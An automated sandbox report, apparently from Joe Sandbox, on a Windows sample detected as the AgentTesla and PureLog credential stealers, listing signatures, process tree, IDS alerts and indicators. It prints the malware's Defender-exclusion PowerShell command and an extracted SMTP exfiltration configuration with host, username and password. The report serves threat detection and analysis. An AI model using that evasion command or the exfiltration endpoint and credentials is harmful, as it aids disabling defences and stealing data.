
Windows Analysis Report
20240328-REV2.exe

Overview

General Information

Sample name:20240328-REV2.exe
Analysis ID:1432024
MD5:ed1e2fd68e9de44ea4e01c7897f64411
SHA1:a42eb4e6084ac91d1fad3ef9fe01d8d3e9db0c26
SHA256:37109eb42fff729d1786ca4b676167f7acaa918a4abaf3bb465cfed6efa2b134
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 20240328-REV2.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\20240328-REV2.exe" MD5: ED1E2FD68E9DE44EA4E01C7897F64411)
    • powershell.exe (PID: 6052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3772 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 20240328-REV2.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\20240328-REV2.exe" MD5: ED1E2FD68E9DE44EA4E01C7897F64411)
    • WerFault.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author
1.2.20240328-REV2.exe.6d50000.10.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
1.2.20240328-REV2.exe.6d50000.10.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
1.2.20240328-REV2.exe.3799970.8.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
1.2.20240328-REV2.exe.436e7a0.7.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
1.2.20240328-REV2.exe.4345780.6.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\20240328-REV2.exe", ParentImage: C:\Users\user\Desktop\20240328-REV2.exe, ParentProcessId: 6840, ParentProcessName: 20240328-REV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", ProcessId: 6052, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\20240328-REV2.exe", ParentImage: C:\Users\user\Desktop\20240328-REV2.exe, ParentProcessId: 6840, ParentProcessName: 20240328-REV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", ProcessId: 6052, ProcessName: powershell.exe

Source: Network Connection
Author: frack113
Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\20240328-REV2.exe, Initiated: true, ProcessId: 4788, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49711

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\20240328-REV2.exe", ParentImage: C:\Users\user\Desktop\20240328-REV2.exe, ParentProcessId: 6840, ParentProcessName: 20240328-REV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", ProcessId: 6052, ProcessName: powershell.exe

Timestamp:04/26/24-10:06:31.436750
SID:2030171
Source Port:49711
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:04/26/24-10:06:31.436750
SID:2839723
Source Port:49711
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:04/26/24-10:06:31.436814
SID:2855542
Source Port:49711
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:04/26/24-10:06:31.436814
SID:2855245
Source Port:49711
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:04/26/24-10:06:31.436814
SID:2840032
Source Port:49711
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:04/26/24-10:06:31.436814
SID:2851779
Source Port:49711
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: http://mail.mbarieservicesltd.com | Avira URL Cloud: Label: malware
Source: WmiPrvSE.exe.3772.10.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
Source: mail.mbarieservicesltd.com | Virustotal: Detection: 5%
Source: http://mail.mbarieservicesltd.com | Virustotal: Detection: 5%
Source: 20240328-REV2.exe | ReversingLabs: Detection: 44%
Source: 20240328-REV2.exe | Virustotal: Detection: 44%
Source: 20240328-REV2.exe | Joe Sandbox ML: detected
Source: 20240328-REV2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 20240328-REV2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Data.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Xml.ni.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: Accessibility.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Drawing.pdb\ source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: Microsoft.VisualBasic.pdbSystem.Data.ni.dll< source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: XZW.pdb source: 20240328-REV2.exe, WER5DE2.tmp.dmp.8.dr
Source: Binary string: mscorlib.pdbx source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.pdbSystem.Data.dll4 source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: XZW.pdbSHA256o source: 20240328-REV2.exe
Source: Binary string: System.Configuration.ni.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Data.ni.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Configuration.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Xml.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Core.ni.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Windows.Forms.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: mscorlib.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Drawing.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: mscorlib.ni.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Data.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Core.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.ni.pdb source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Data.pdb, source: WER5DE2.tmp.dmp.8.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr

Networking

Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.8:49711 -> 199.79.62.115:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.8:49711 -> 199.79.62.115:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49711 -> 199.79.62.115:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.8:49711 -> 199.79.62.115:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.8:49711 -> 199.79.62.115:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.8:49711 -> 199.79.62.115:587
Source: global traffic | TCP traffic: 192.168.2.8:49711 -> 199.79.62.115:587
Source: Joe Sandbox View | IP Address: 199.79.62.115
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: global traffic | TCP traffic: 192.168.2.8:49711 -> 199.79.62.115:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mail.mbarieservicesltd.com
Source: 20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.mbarieservicesltd.com
Source: 20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mbarieservicesltd.com
Source: 20240328-REV2.exe, 00000001.00000002.1581428931.000000000280D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.8.dr | String found in binary or memory: http://upx.sf.net
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796
                        Source: 20240328-REV2.exe, 00000001.00000000.1493632755.00000000003AE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXZW.exe& vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1581428931.000000000280D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1580368727.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1586570461.0000000007622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1587945175.000000000B0E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000005.00000002.2743308776.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000005.00000002.2743688093.00000000008F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 20240328-REV2.exe
                        Source: 20240328-REV2.exeBinary or memory string: OriginalFilenameXZW.exe& vs 20240328-REV2.exe
                        Source: 20240328-REV2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 20240328-REV2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, DqO3BeEpxTFOeAX25D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csSecurity API names: _0020.SetAccessControl
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csSecurity API names: _0020.AddAccessRule
                        Source: 1.2.20240328-REV2.exe.27f6814.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 1.2.20240328-REV2.exe.2a18018.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 1.2.20240328-REV2.exe.27e6474.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 1.2.20240328-REV2.exe.6d80000.11.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/11@1/1
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20240328-REV2.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6840
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tckzrrwj.5ng.ps1Jump to behavior
                        Source: 20240328-REV2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 20240328-REV2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 20240328-REV2.exeReversingLabs: Detection: 44%
                        Source: 20240328-REV2.exeVirustotal: Detection: 44%
                        Source: unknownProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: textshaping.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
